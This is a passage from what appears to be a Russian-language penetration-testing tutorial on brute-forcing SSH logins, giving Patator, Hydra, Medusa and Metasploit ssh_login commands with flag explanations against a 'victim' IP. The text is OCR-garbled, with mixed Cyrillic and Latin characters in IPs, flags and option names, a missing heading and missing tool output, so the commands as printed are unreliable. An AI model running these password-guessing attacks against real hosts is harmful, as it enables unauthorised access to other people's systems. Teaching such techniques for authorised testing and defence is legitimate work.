3.8. Брутфорс SSH

3.8.1. Использование Patator

patator ssh_login host=lll.11.11.11 user=test password=FIIEO O=/root/wordlist -х ignore:mesg='Authentication failed'

ssh_login host user

password

-х ignore:mesg= 'Authentication failed'

hydra -V -f -t 4 -1 test -Р /root/wordlist ssh://111.11.11.ll

Параметры:

•-V- показывать пару логин+пароль во время перебора

•-f-остановка, как только будет найден пароль для указа ного логина

•-Р- путь до словаря с паролями

•ssh://111.11.11.11- IР-адрес жертвы

3.8.3. Инструмент Medusa

Для подбора пароля с использованием Medusa выполним команду:

medusa -h 192.168.60.50 -u test -Р /root/wordlist -М ssh -f -v 6

где:

•-h- IР-адрес жертвы

•-u-логин

•-Р- путь к словарю

•-М - выбор модуля

•-f- остановка после нахождения валидной пары логин/пароль

•-v - настройка отображения сообщений на экране во время процесса под­ бора

3.8.4.Metasploit

Здесь сначала нужно произвести поиск инструмента для произведения brute­ force атаки:

-················································································'

Вывод будет таким:

Обрати внимание: есть два модуля. Первый обеспечивает подбор логина и пароля, а второй - логина и публичного ключа. Нас сейчас интересует пер­ вый модуль:

use auxiliary/scanner /ssh /ssh_login

Для просмотра необходимых параметров, воспользуемся командой show options. Необходимые сейчас параметры:

•rhosts-IP-aдpec жертвы

•rport - порт

•username - логин SSH

•userpassJiJe - путь до словаря с паролями

•stop_on_success - остановка, как только найдется пара логин/пароль

•threads - количество потоков

Указание необходимых параметров производится через команду "set".

set r hosts 111.11.11.11 set userna me test

set userpass_file /root/wordlist

•set stop_on_success yes set t hreads 4

··················································································tD